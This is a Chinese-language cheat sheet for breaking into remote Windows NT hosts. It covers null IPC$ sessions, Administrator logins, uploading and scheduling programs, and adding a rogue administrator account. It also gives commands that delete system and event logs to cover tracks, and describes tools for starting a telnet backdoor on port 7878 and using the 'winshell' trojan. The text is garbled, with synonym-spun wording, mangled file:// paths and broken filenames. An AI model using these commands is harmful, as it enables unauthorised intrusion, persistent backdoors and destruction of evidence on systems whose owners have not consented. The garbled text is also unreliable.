常用的几条NET号令:
(与长途主机成立空管毗连) net use file://IP/地址\ipc$ "" /use:""
(以治理员身份登录长途主机) net use file://IP/地址\ipc$ "密码" /use:"Administrator"
(传送文件到长途主机WINNT目次下)copy 本机目次途径\法式 file://IP/地址\admin$
(查看长途主机时间) net time file://IP/地址
(按时启动某个法式) at file://IP/地址 02:18 readme。
exe
(查看共享) net view file://IP/地址
(查看netbios工做组列表) nbtstat -A IP地址
(将长途主机C盘映射为本身的F盘) net use f: file://IP/地址\c$ ""/user:"Administrator"
(那两条把本身增加到治理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开毗连) net use file://IP/地址\ipc$ /delete
收尾:
del C:\winnt\system32\logfiles\*。
del C:\winnt\ssytem32\config\*。evt
del C:\winnt\system32\dtclog\*。*
del C:\winnt\system32\*。log
del C:\winnt\system32\*。
txt
del C:\winnt\*。txt
del C:\winnt\*。log
一、netsvc。exe
下面的号令别离是列出主机上的办事项目、查觅和长途启动主机的“时间使命”办事:
netsvc /list file://IP/地址
netsvc schedule file://IP/地址 /query
netsvc file://IP/地址 schedule /start
二、OpenTelnet。
exe
长途启动主机的Telnet办事,并绑定端口到7878,例如:
OpenTelnet file://IP/地址 用户名 密码 1 7878
然后就能够telnet到主机的7878端口,进进DOS体例下:
telnet IP地址 7878
三、winshell。
exe
一个十分小的木马(不到6K),telnet到主机的7878端口,输进密码winshell,当看到CMD后,可打下面的号令:
p Path (查看winshell主法式的途径信息)。